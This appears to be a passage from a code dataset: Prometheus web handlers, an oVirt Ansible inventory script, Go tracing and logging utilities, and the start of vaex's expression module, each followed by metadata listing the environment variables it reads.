http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
ctx = httputil.ContextFromRequest(ctx, r)
// Provide URL parameters as a map for easy use. Advanced users may have need for
// parameters beyond the first, so provide RawParams.
rawParams, err := url.ParseQuery(r.URL.RawQuery)
if err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
params := map[string]string{}
for k, v := range rawParams {
params[k] = v[0]
}
externalLabels := map[string]string{}
h.mtx.RLock()
els := h.config.GlobalConfig.ExternalLabels
h.mtx.RUnlock()
for _, el := range els {
externalLabels[el.Name] = el.Value
}
// Inject some convenience variables that are easier to remember for users
// who are not used to Go's templating system.
defs := []string{
"{{$rawParams := .RawParams }}",
"{{$params := .Params}}",
"{{$path := .Path}}",
"{{$externalLabels := .ExternalLabels}}",
}
data := struct {
RawParams url.Values
Params map[string]string
Path string
ExternalLabels map[string]string
}{
RawParams: rawParams,
Params: params,
Path: strings.TrimLeft(name, "/"),
ExternalLabels: externalLabels,
}
tmpl := template.NewTemplateExpander(
ctx,
strings.Join(append(defs, string(text)), ""),
"__console_"+name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
filenames, err := filepath.Glob(h.options.ConsoleLibrariesPath + "/*.lib")
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
result, err := tmpl.ExpandHTML(filenames)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
func (h *Handler) graph(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "graph.html", nil)
}
func (h *Handler) status(w http.ResponseWriter, r *http.Request) {
status := struct {
Birth time.Time
CWD string
Version *PrometheusVersion
Alertmanagers []*url.URL
GoroutineCount int
GOMAXPROCS int
GOGC string
GODEBUG string
CorruptionCount int64
ChunkCount int64
TimeSeriesCount int64
LastConfigTime time.Time
ReloadConfigSuccess bool
StorageRetention string
NumSeries uint64
MaxTime int64
MinTime int64
Stats *index.PostingsStats
Duration string
}{
Birth: h.birth,
CWD: h.cwd,
Version: h.versionInfo,
Alertmanagers: h.notifier.Alertmanagers(),
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
http.Error(w, fmt.Sprintf("error gathering runtime status: %s", err), http.StatusInternalServerError)
return
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_head_chunks":
status.ChunkCount = int64(toFloat64(mF))
case "prometheus_tsdb_head_series":
status.TimeSeriesCount = int64(toFloat64(mF))
case "prometheus_tsdb_wal_corruptions_total":
status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
startTime := time.Now().UnixNano()
s, err := h.localStorage.Stats("__name__")
if err != nil {
if errors.Cause(err) == tsdb.ErrNotReady {
http.Error(w, tsdb.ErrNotReady.Error(), http.StatusServiceUnavailable)
return
}
http.Error(w, fmt.Sprintf("error gathering local storage statistics: %s", err), http.StatusInternalServerError)
return
}
status.Duration = fmt.Sprintf("%.3f", float64(time.Now().UnixNano()-startTime)/float64(1e9))
status.Stats = s.IndexPostingStats
status.NumSeries = s.NumSeries
status.MaxTime = s.MaxTime
status.MinTime = s.MinTime
h.executeTemplate(w, "status.html", status)
}
func (h *Handler) runtimeInfo() (api_v1.RuntimeInfo, error) {
status := api_v1.RuntimeInfo{
StartTime: h.birth,
CWD: h.cwd,
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
return status, errors.Errorf("error gathering runtime status: %s", err)
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_wal_corruptions_total":
status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
return status, nil
}
func toFloat64(f *io_prometheus_client.MetricFamily) float64 {
m := *f.Metric[0]
if m.Gauge != nil {
return m.Gauge.GetValue()
}
if m.Counter != nil {
return m.Counter.GetValue()
}
if m.Untyped != nil {
return m.Untyped.GetValue()
}
return math.NaN()
}
func (h *Handler) flags(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "flags.html", h.flagsMap)
}
func (h *Handler) serveConfig(w http.ResponseWriter, r *http.Request) {
h.mtx.RLock()
defer h.mtx.RUnlock()
h.executeTemplate(w, "config.html", h.config.String())
}
func (h *Handler) rules(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "rules.html", h.ruleManager)
}
func (h *Handler) serviceDiscovery(w http.ResponseWriter, r *http.Request) {
var index []string
targets := h.scrapeManager.TargetsAll()
for job := range targets {
index = append(index, job)
}
sort.Strings(index)
scrapeConfigData := struct {
Index []string
Targets map[string][]*scrape.Target
Active []int
Dropped []int
Total []int
}{
Index: index,
Targets: make(map[string][]*scrape.Target),
Active: make([]int, len(index)),
Dropped: make([]int, len(index)),
Total: make([]int, len(index)),
}
for i, job := range scrapeConfigData.Index {
scrapeConfigData.Targets[job] = make([]*scrape.Target, 0, len(targets[job]))
scrapeConfigData.Total[i] = len(targets[job])
for _, target := range targets[job] {
// Do not display more than 100 dropped targets per job to avoid
// returning too much data to the clients.
if target.Labels().Len() == 0 {
scrapeConfigData.Dropped[i]++
if scrapeConfigData.Dropped[i] > 100 {
continue
}
} else {
scrapeConfigData.Active[i]++
}
scrapeConfigData.Targets[job] = append(scrapeConfigData.Targets[job], target)
}
}
h.executeTemplate(w, "service-discovery.html", scrapeConfigData)
}
func (h *Handler) targets(w http.ResponseWriter, r *http.Request) {
tps := h.scrapeManager.TargetsActive()
for _, targets := range tps {
sort.Slice(targets, func(i, j int) bool {
iJobLabel := targets[i].Labels().Get(model.JobLabel)
jJobLabel := targets[j].Labels().Get(model.JobLabel)
if iJobLabel == jJobLabel {
return targets[i].Labels().Get(model.InstanceLabel) < targets[j].Labels().Get(model.InstanceLabel)
}
return iJobLabel < jJobLabel
})
}
h.executeTemplate(w, "targets.html", struct {
TargetPools map[string][]*scrape.Target
}{
TargetPools: tps,
})
}
func (h *Handler) version(w http.ResponseWriter, r *http.Request) {
dec := json.NewEncoder(w)
if err := dec.Encode(h.versionInfo); err != nil {
http.Error(w, fmt.Sprintf("error encoding JSON: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) quit(w http.ResponseWriter, r *http.Request) {
var closed bool
h.quitOnce.Do(func() {
closed = true
close(h.quitCh)
fmt.Fprintf(w, "Requesting termination... Goodbye!")
})
if !closed {
fmt.Fprintf(w, "Termination already in progress.")
}
}
func (h *Handler) reload(w http.ResponseWriter, r *http.Request) {
rc := make(chan error)
h.reloadCh <- rc
if err := <-rc; err != nil {
http.Error(w, fmt.Sprintf("failed to reload config: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) consolesPath() string {
if _, err := os.Stat(h.options.ConsoleTemplatesPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/consoles/index.html"
}
if h.options.UserAssetsPath != "" {
if _, err := os.Stat(h.options.UserAssetsPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/user/index.html"
}
}
return ""
}
func tmplFuncs(consolesPath string, opts *Options) template_text.FuncMap {
return template_text.FuncMap{
"since": func(t time.Time) time.Duration {
return time.Since(t) / time.Millisecond * time.Millisecond
},
"unixToTime": func(i int64) time.Time {
t := time.Unix(i/int64(time.Microsecond), 0).UTC()
return t
},
"consolesPath": func() string { return consolesPath },
"pathPrefix": func() string { return opts.ExternalURL.Path },
"pageTitle": func() string { return opts.PageTitle },
"buildVersion": func() string { return opts.Version.Revision },
"globalURL": func(u *url.URL) *url.URL {
host, port, err := net.SplitHostPort(u.Host)
if err != nil {
return u
}
for _, lhr := range api_v1.LocalhostRepresentations {
if host == lhr {
_, ownPort, err := net.SplitHostPort(opts.ListenAddress)
if err != nil {
return u
}
if port == ownPort {
// Only in the case where the target is on localhost and its port is
// the same as the one we're listening on, we know for sure that
// we're monitoring our own process and that we need to change the
// scheme, hostname, and port to the externally reachable ones as
// well. We shouldn't need to touch the path at all, since if a
// path prefix is defined, the path under which we scrape ourselves
// should already contain the prefix.
u.Scheme = opts.ExternalURL.Scheme
u.Host = opts.ExternalURL.Host
} else {
// Otherwise, we only know that localhost is not reachable
// externally, so we replace only the hostname by the one in the
// external URL. It could be the wrong hostname for the service on
// this port, but it's still the best possible guess.
host, _, err := net.SplitHostPort(opts.ExternalURL.Host)
if err != nil {
return u
}
u.Host = host + ":" + port
}
break
}
}
return u
},
"numHealthy": func(pool []*scrape.Target) int {
alive := len(pool)
for _, p := range pool {
if p.Health() != scrape.HealthGood {
alive--
}
}
return alive
},
"targetHealthToClass": func(th scrape.TargetHealth) string {
switch th {
case scrape.HealthUnknown:
return "warning"
case scrape.HealthGood:
return "success"
default:
return "danger"
}
},
"ruleHealthToClass": func(rh rules.RuleHealth) string {
switch rh {
case rules.HealthUnknown:
return "warning"
case rules.HealthGood:
return "success"
default:
return "danger"
}
},
"alertStateToClass": func(as rules.AlertState) string {
switch as {
case rules.StateInactive:
return "success"
case rules.StatePending:
return "warning"
case rules.StateFiring:
return "danger"
default:
panic("unknown alert state")
}
},
}
}
func (h *Handler) getTemplate(name string) (string, error) {
var tmpl string
appendf := func(name string) error {
f, err := ui.Assets.Open(path.Join("/templates", name))
if err != nil {
return err
}
defer f.Close()
b, err := ioutil.ReadAll(f)
if err != nil {
return err
}
tmpl += string(b)
return nil
}
err := appendf("_base.html")
if err != nil {
return "", errors.Wrap(err, "error reading base template")
}
err = appendf(name)
if err != nil {
return "", errors.Wrapf(err, "error reading page template %s", name)
}
return tmpl, nil
}
func (h *Handler) executeTemplate(w http.ResponseWriter, name string, data interface{}) {
text, err := h.getTemplate(name)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
tmpl := template.NewTemplateExpander(
h.context,
text,
name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
tmpl.Funcs(tmplFuncs(h.consolesPath(), h.options))
result, err := tmpl.ExpandHTML(nil)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
// AlertStatus bundles alerting rules and the mapping of alert states to row classes.
type AlertStatus struct {
Groups []*rules.Group
AlertStateToRowClass map[rules.AlertState]string
Counts AlertByStateCount
}
type AlertByStateCount struct {
Inactive int32
Pending int32
Firing int32
}
func setPathWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
handler(w, r.WithContext(httputil.ContextWithPath(r.Context(), prefix+r.URL.Path)))
}
}
}
|
[
"\"GOGC\"",
"\"GODEBUG\"",
"\"GOGC\"",
"\"GODEBUG\""
] |
[] |
[
"GOGC",
"GODEBUG"
] |
[]
|
["GOGC", "GODEBUG"]
|
go
| 2 | 0 | |
inventory/rhv/hosts/ovirt.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
"""
oVirt dynamic inventory script
=================================
Generates dynamic inventory file for oVirt.
Script will return following attributes for each virtual machine:
- id
- name
- host
- cluster
- status
- description
- fqdn
- os_type
- template
- tags
- statistics
- devices
When run in --list mode, virtual machines are grouped by the following categories:
- cluster
- tag
- status
Note: If there is some virtual machine which has has more tags it will be in both tag
records.
Examples:
# Execute update of system on webserver virtual machine:
$ ansible -i contrib/inventory/ovirt4.py webserver -m yum -a "name=* state=latest"
# Get webserver virtual machine information:
$ contrib/inventory/ovirt4.py --host webserver
Author: Ondra Machacek (@machacekondra)
"""
import argparse
import os
import sys
from collections import defaultdict
try:
import ConfigParser as configparser
except ImportError:
import configparser
try:
import json
except ImportError:
import simplejson as json
try:
import ovirtsdk4 as sdk
import ovirtsdk4.types as otypes
except ImportError:
print('oVirt inventory script requires ovirt-engine-sdk-python >= 4.0.0')
sys.exit(1)
def parse_args():
"""
Create command line parser for oVirt dynamic inventory script.
"""
parser = argparse.ArgumentParser(
description='Ansible dynamic inventory script for oVirt.',
)
parser.add_argument(
'--list',
action='store_true',
default=True,
help='Get data of all virtual machines (default: True).',
)
parser.add_argument(
'--host',
help='Get data of virtual machines running on specified host.',
)
parser.add_argument(
'--pretty',
action='store_true',
default=False,
help='Pretty format (default: False).',
)
return parser.parse_args()
def load_config_file():
# Get the path of the configuration file, by default use
# 'ovirt.ini' file in script directory:
default_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'ovirt.ini',
)
config_path = os.environ.get('OVIRT_INI_PATH', default_path)
# Create parser and add ovirt section if it doesn't exist:
config = configparser.ConfigParser(
defaults={
'ovirt_url': '',
'ovirt_username': '',
'ovirt_password': '',
'ovirt_ca_file': '',
'vm_filter': '',
}
)
if not config.has_section('ovirt'):
config.add_section('ovirt')
config.read(config_path)
return config
def create_connection():
"""
Create a connection to oVirt engine API.
"""
# Create a connection with options defined in ini file:
return sdk.Connection(
url=os.environ.get('OVIRT_API_URL'),
username=os.environ.get('OVIRT_USERNAME'),
password=os.environ.get('OVIRT_PASSWORD'),
ca_file=os.environ.get('OVIRT_CA_FILE'),
insecure=os.environ.get('OVIRT_CA_FILE') is None,
)
def get_dict_of_struct(connection, vm):
"""
Transform SDK Vm Struct type to Python dictionary.
"""
vms_service = connection.system_service().vms_service()
clusters_service = connection.system_service().clusters_service()
vm_service = vms_service.vm_service(vm.id)
devices = vm_service.reported_devices_service().list()
tags = vm_service.tags_service().list()
stats = vm_service.statistics_service().list()
labels = vm_service.affinity_labels_service().list()
groups = clusters_service.cluster_service(
vm.cluster.id
).affinity_groups_service().list()
return {
'openshift_hostname': 'vm.fqdn',
'ansible_host': vm.fqdn,
'id': vm.id,
'name': vm.name,
'host': connection.follow_link(vm.host).name if vm.host else None,
'cluster': connection.follow_link(vm.cluster).name,
'status': str(vm.status),
'description': vm.description,
'fqdn': vm.fqdn,
'os_type': vm.os.type,
'template': connection.follow_link(vm.template).name,
'tags': [tag.name for tag in tags],
'affinity_labels': [label.name for label in labels],
'affinity_groups': [
group.name for group in groups
if vm.name in [vm.name for vm in connection.follow_link(group.vms)]
],
# 'statistics': dict(
# (stat.name, stat.values[0].datum) for stat in stats
# ),
# 'devices': dict(
# (device.name, [ip.address for ip in device.ips]) for device in devices
# ),
# 'ansible_host': devices[0].ips[0].address if len(devices) > 0 else None,
}
def get_data(connection, vm_name=None):
"""
Obtain data of `vm_name` if specified, otherwise obtain data of all vms.
"""
vms_service = connection.system_service().vms_service()
clusters_service = connection.system_service().clusters_service()
config = load_config_file()
if vm_name:
vm = vms_service.list(search='name=%s' % vm_name) or [None]
data = get_dict_of_struct(
connection=connection,
vm=vm[0],
)
else:
vms = dict()
data = defaultdict(list)
vm_filter = config.get('ovirt', 'vm_filter')
for vm in vms_service.list(search='%s' % vm_filter):
name = vm.name
vm_service = vms_service.vm_service(vm.id)
cluster_service = clusters_service.cluster_service(vm.cluster.id)
# Add vm to vms dict:
vms[name] = get_dict_of_struct(connection, vm)
# Add vm to cluster group:
cluster_name = connection.follow_link(vm.cluster).name
data['cluster_%s' % cluster_name].append(name)
# Add vm to tag group:
tags_service = vm_service.tags_service()
for tag in tags_service.list():
# print tag.name
data['tag_Name_%s' % tag.name].append(name)
# Add vm to status group:
data['status_%s' % vm.status].append(name)
# Add vm to affinity group:
for group in cluster_service.affinity_groups_service().list():
if vm.name in [
v.name for v in connection.follow_link(group.vms)
]:
data['affinity_group_%s' % group.name].append(vm.name)
# Add vm to affinity label group:
affinity_labels_service = vm_service.affinity_labels_service()
for label in affinity_labels_service.list():
data['affinity_label_%s' % label.name].append(name)
data["_meta"] = {
'hostvars': vms,
}
return data
def main():
args = parse_args()
connection = create_connection()
print(
json.dumps(
obj=get_data(
connection=connection,
vm_name=args.host,
),
sort_keys=args.pretty,
indent=args.pretty * 2,
)
)
if __name__ == '__main__':
main()
|
[] |
[] |
[
"OVIRT_CA_FILE",
"OVIRT_PASSWORD",
"OVIRT_API_URL",
"OVIRT_USERNAME",
"OVIRT_INI_PATH"
] |
[]
|
["OVIRT_CA_FILE", "OVIRT_PASSWORD", "OVIRT_API_URL", "OVIRT_USERNAME", "OVIRT_INI_PATH"]
|
python
| 5 | 0 | |
utils/utils.go
|
package utils
import (
"context"
"net/http"
"os"
"strings"
"github.com/carousell/Orion/utils/log"
newrelic "github.com/newrelic/go-agent"
"go.elastic.co/apm"
)
const (
newRelicTransactionID = "NewRelicTransaction"
)
var (
// NewRelicApp is the reference for newrelic application
NewRelicApp newrelic.Application
)
//GetHostname fetches the hostname of the system
func GetHostname() string {
host := os.Getenv("HOST")
if host == "" {
host = "localhost"
}
log.Info(context.Background(), "HOST", host)
return host
}
//GetNewRelicTransactionFromContext fetches the new relic transaction that is stored in the context
func GetNewRelicTransactionFromContext(ctx context.Context) newrelic.Transaction {
t := ctx.Value(newRelicTransactionID)
if t != nil {
txn, ok := t.(newrelic.Transaction)
if ok {
return txn
}
}
return nil
}
//StoreNewRelicTransactionToContext stores a new relic transaction object to context
func StoreNewRelicTransactionToContext(ctx context.Context, t newrelic.Transaction) context.Context {
return context.WithValue(ctx, newRelicTransactionID, t)
}
//StartNRTransaction starts a new newrelic transaction
func StartNRTransaction(path string, ctx context.Context, req *http.Request, w http.ResponseWriter) context.Context {
if req == nil {
if !strings.HasPrefix(path, "/") {
path = "/" + path
}
req, _ = http.NewRequest("", path, nil)
}
if NewRelicApp != nil {
// check if transaction has been initialized
t := GetNewRelicTransactionFromContext(ctx)
if t == nil {
t := NewRelicApp.StartTransaction(path, w, req)
ctx = StoreNewRelicTransactionToContext(ctx, t)
}
}
// check if transaction has been initialized
tx := apm.TransactionFromContext(ctx)
if tx == nil {
tx := apm.DefaultTracer.StartTransaction(path, "request")
ctx = apm.ContextWithTransaction(ctx, tx)
}
return ctx
}
//FinishNRTransaction finishes an existing transaction
func FinishNRTransaction(ctx context.Context, err error) {
t := GetNewRelicTransactionFromContext(ctx)
if t != nil {
t.NoticeError(err)
t.End()
}
tx := apm.TransactionFromContext(ctx)
if tx != nil {
apm.CaptureError(ctx, err)
tx.End()
}
}
//IgnoreNRTransaction ignores this NR trasaction and prevents it from being reported
func IgnoreNRTransaction(ctx context.Context) error {
t := GetNewRelicTransactionFromContext(ctx)
if t != nil {
return t.Ignore()
}
return nil
}
|
[
"\"HOST\""
] |
[] |
[
"HOST"
] |
[]
|
["HOST"]
|
go
| 1 | 0 | |
logging/pirriLogging.go
|
package logging
import (
"bytes"
"encoding/json"
"fmt"
"io"
"os"
"os/exec"
"strings"
"sync"
"time"
"github.com/b4b4r07/go-pipe"
"go.uber.org/zap/zapcore"
"go.uber.org/zap"
)
var instance *PirriLogger
var once sync.Once
// PirriLogger is the logging thing
type PirriLogger struct {
lock sync.Mutex
logger *zap.Logger
}
//Service returns logging service in a singleton
func Service() *PirriLogger {
once.Do(func() {
instance = &PirriLogger{
lock: sync.Mutex{},
}
instance.init()
})
return instance
}
func (l *PirriLogger) init() {
rawJSON := []byte(`{
"level": "debug",
"encoding": "json",
"initialFields": {"application": "PirriGo"},
"encoderConfig": {
"messageKey": "message",
"levelKey": "level",
"levelEncoder": "lowercase"
}
}`)
var cfg zap.Config
if err := json.Unmarshal(rawJSON, &cfg); err != nil {
panic(err)
}
// cfg.EncoderConfig.TimeKey = "time"
cfg.EncoderConfig.StacktraceKey = "stacktrace"
cfg.ErrorOutputPaths = []string{os.Getenv("PIRRIGO_LOG_LOCATION")}
cfg.OutputPaths = []string{os.Getenv("PIRRIGO_LOG_LOCATION")}
logger, err := cfg.Build()
l.logger = logger
if err != nil {
panic(err)
}
}
// LogEvent logs events
func (l *PirriLogger) LogEvent(message string, fields ...zapcore.Field) {
if os.Getenv("PIRRIGO_LOG_LOCATION") != "" {
fmt.Println("EVENT: ", message)
defer l.logger.Sync()
defer l.lock.Unlock()
l.lock.Lock()
fields = append(
fields,
[]zapcore.Field{
zap.String("time", time.Now().Format(os.Getenv("PIRRIGO_DATE_FORMAT"))),
}...,
)
l.logger.Debug(
message,
fields...,
)
}
}
//LogError logs errors
func (l *PirriLogger) LogError(message string, fields ...zapcore.Field) {
defer l.logger.Sync()
defer l.lock.Unlock()
l.lock.Lock()
fields = append(
fields,
[]zapcore.Field{
zap.String("time", time.Now().Format(os.Getenv("PIRRIGO_DATE_FORMAT"))),
}...,
)
l.logger.Error(
message,
fields...,
)
}
func (l *PirriLogger) LoadJournalCtlLogs() []string {
defer l.lock.Unlock()
var b bytes.Buffer
pipe.Command(&b,
exec.Command("journalctl", "-xe"),
exec.Command("grep", "pirrigo"),
)
io.Copy(os.Stdout, &b)
l.lock.Lock()
return reverseLogs(strings.Split(b.String(), "\n"))
}
func reverseLogs(s []string) []string {
i := 0
j := len(s) - 1
for i < j {
s[i], s[j] = s[j], s[i]
i++
j--
}
return s
}
|
[
"\"PIRRIGO_LOG_LOCATION\"",
"\"PIRRIGO_LOG_LOCATION\"",
"\"PIRRIGO_LOG_LOCATION\"",
"\"PIRRIGO_DATE_FORMAT\"",
"\"PIRRIGO_DATE_FORMAT\""
] |
[] |
[
"PIRRIGO_LOG_LOCATION",
"PIRRIGO_DATE_FORMAT"
] |
[]
|
["PIRRIGO_LOG_LOCATION", "PIRRIGO_DATE_FORMAT"]
|
go
| 2 | 0 | |
packages/vaex-core/vaex/expression.py
|
import ast
import copy
import os
import base64
import datetime
from pydoc import doc
import time
import cloudpickle as pickle
import functools
import operator
import six
import collections
import weakref
from future.utils import with_metaclass
import numpy as np
import pandas as pd
import tabulate
import pyarrow as pa
import vaex.hash
import vaex.serialize
from vaex.utils import _ensure_strings_from_expressions, _ensure_string_from_expression
from vaex.column import ColumnString, _to_string_sequence
from .hash import counter_type_from_dtype
from vaex.datatype import DataType
from vaex.docstrings import docsubst
from . import expresso
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
try:
collectionsAbc = collections.abc
except AttributeError:
collectionsAbc = collections
# TODO: repeated from dataframe.py
default_shape = 128
PRINT_MAX_COUNT = 10
expression_namespace = {}
expression_namespace['nan'] = np.nan
expression_namespace = {}
expression_namespace['nan'] = np.nan
_binary_ops = [
dict(code="+", name='add', op=operator.add),
dict(code="in", name='contains', op=operator.contains),
dict(code="/", name='truediv', op=operator.truediv),
dict(code="//", name='floordiv', op=operator.floordiv),
dict(code="&", name='and', op=operator.and_),
dict(code="^", name='xor', op=operator.xor),
dict(code="|", name='or', op=operator.or_),
dict(code="**", name='pow', op=operator.pow),
dict(code="is", name='is', op=operator.is_),
dict(code="is not", name='is_not', op=operator.is_not),
dict(code="<<", name='lshift', op=operator.lshift),
dict(code="%", name='mod', op=operator.mod),
dict(code="*", name='mul', op=operator.mul),
dict(code=">>", name='rshift', op=operator.rshift),
dict(code="-", name='sub', op=operator.sub),
dict(code="<", name='lt', op=operator.lt),
dict(code="<=", name='le', op=operator.le),
dict(code="==", name='eq', op=operator.eq),
dict(code="!=", name='ne', op=operator.ne),
dict(code=">=", name='ge', op=operator.ge),
dict(code=">", name='gt', op=operator.gt),
]
if hasattr(operator, 'div'):
_binary_ops.append(dict(code="/", name='div', op=operator.div))
if hasattr(operator, 'matmul'):
_binary_ops.append(dict(code="@", name='matmul', op=operator.matmul))
reversable = 'add sub mul matmul truediv floordiv mod divmod pow lshift rshift and xor or'.split()
_unary_ops = [
dict(code="~", name='invert', op=operator.invert),
dict(code="-", name='neg', op=operator.neg),
dict(code="+", name='pos', op=operator.pos),
]
class Meta(type):
def __new__(upperattr_metaclass, future_class_name,
future_class_parents, attrs):
# attrs = {}
for op in _binary_ops:
def wrap(op=op):
def f(a, b):
self = a
# print(op, a, b)
if isinstance(b, str) and self.dtype.is_datetime:
b = np.datetime64(b)
if self.df.is_category(self.expression) and self.df._future_behaviour and not isinstance(b, Expression):
labels = self.df.category_labels(self.expression)
if b not in labels:
raise ValueError(f'Value {b} not present in {labels}')
b = labels.index(b)
a = self.index_values()
try:
stringy = isinstance(b, str) or b.is_string()
except:
# this can happen when expression is a literal, like '1' (used in propagate_unc)
# which causes the dtype to fail
stringy = False
if stringy:
if isinstance(b, str):
b = repr(b)
if op['code'] == '==':
expression = 'str_equals({0}, {1})'.format(a.expression, b)
elif op['code'] == '!=':
expression = 'str_notequals({0}, {1})'.format(a.expression, b)
elif op['code'] == '+':
expression = 'str_cat({0}, {1})'.format(a.expression, b)
else:
raise ValueError('operand %r not supported for string comparison' % op['code'])
return Expression(self.ds, expression=expression)
else:
if isinstance(b, Expression):
assert b.ds == a.ds
b = b.expression
elif isinstance(b, (np.timedelta64)):
unit, step = np.datetime_data(b.dtype)
assert step == 1
b = b.astype(np.uint64).item()
b = f'scalar_timedelta({b}, {unit!r})'
elif isinstance(b, (np.datetime64)):
b = f'scalar_datetime("{b}")'
elif isinstance(b, np.ndarray) and b.ndim == 0 and vaex.dtype_of(b).is_datetime:
b = f'scalar_datetime("{b}")'
elif isinstance(b, np.ndarray) and b.ndim == 0 and vaex.dtype_of(b).is_timedelta:
unit, step = np.datetime_data(b.dtype)
assert step == 1
b = b.astype(np.uint64).item()
b = f'scalar_timedelta({b}, {unit!r})'
expression = '({0} {1} {2})'.format(a.expression, op['code'], b)
return Expression(self.ds, expression=expression)
attrs['__%s__' % op['name']] = f
if op['name'] in reversable:
def f(a, b):
self = a
if isinstance(b, str):
if op['code'] == '+':
expression = 'str_cat({1}, {0})'.format(a.expression, repr(b))
else:
raise ValueError('operand %r not supported for string comparison' % op['code'])
return Expression(self.ds, expression=expression)
else:
if isinstance(b, Expression):
assert b.ds == a.ds
b = b.expression
expression = '({2} {1} {0})'.format(a.expression, op['code'], b)
return Expression(self.ds, expression=expression)
attrs['__r%s__' % op['name']] = f
wrap(op)
for op in _unary_ops:
def wrap(op=op):
def f(a):
self = a
expression = '{0}({1})'.format(op['code'], a.expression)
return Expression(self.ds, expression=expression)
attrs['__%s__' % op['name']] = f
wrap(op)
return type(future_class_name, future_class_parents, attrs)
class DateTime(object):
"""DateTime operations
Usually accessed using e.g. `df.birthday.dt.dayofweek`
"""
def __init__(self, expression):
self.expression = expression
class TimeDelta(object):
"""TimeDelta operations
Usually accessed using e.g. `df.delay.td.days`
"""
def __init__(self, expression):
self.expression = expression
class StringOperations(object):
"""String operations.
Usually accessed using e.g. `df.name.str.lower()`
"""
def __init__(self, expression):
self.expression = expression
class StringOperationsPandas(object):
"""String operations using Pandas Series (much slower)"""
def __init__(self, expression):
self.expression = expression
class StructOperations(collections.abc.Mapping):
"""Struct Array operations.
Usually accessed using e.g. `df.name.struct.get('field1')`
"""
def __init__(self, expression):
self.expression = expression
self._array = self.expression.values
def __iter__(self):
for name in self.keys():
yield name
def __getitem__(self, key):
"""Return struct field by either field name (string) or index position (index).
In case of ambiguous field names, a `LookupError` is raised.
"""
self._assert_struct_dtype()
return self.get(key)
def __len__(self):
"""Return the number of struct fields contained in struct array.
"""
self._assert_struct_dtype()
return len(self._array.type)
def keys(self):
"""Return all field names contained in struct array.
:returns: list of field names.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.keys()
["col1", "col2"]
"""
self._assert_struct_dtype()
return [field.name for field in self._array.type]
def values(self):
"""Return all fields as vaex expressions.
:returns: list of vaex expressions corresponding to each field in struct.
Example:
>>> import vaex
>>> import pyarrow as pa
>>> array = pa.StructArray.from_arrays(arrays=[[1,2], ["a", "b"]], names=["col1", "col2"])
>>> df = vaex.from_arrays(array=array)
>>> df
# array
0 {'col1': 1, 'col2': 'a'}
1 {'col1': 2, 'col2': 'b'}
>>> df.array.struct.values()
[Expression = struct_get(array, 0)
Length: 2 dtype: int64 (expression)
-----------------------------------
0 1
1 2,
Expression = struct_get(array, 1)
Length: 2 dtype: string (expression)
------------------------------------
0 a
1 b]
"""
